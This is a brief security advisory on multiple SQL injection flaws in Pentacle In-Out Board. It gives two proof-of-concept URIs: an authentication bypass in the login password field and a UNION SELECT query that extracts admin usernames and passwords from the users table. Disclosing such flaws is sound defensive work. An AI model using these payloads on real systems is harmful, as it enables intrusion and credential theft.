|
Pentacle In-Out Board Multiple SQL Injection Vulnerabilities
These issues can be exploited through use of a web client. The following proof of concept URI are available: http://www.example.com/[ptdir]/login.asp?username=any&password=' or '1'='1 http://www.example.com/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes |
|
|
Privacy Statement |
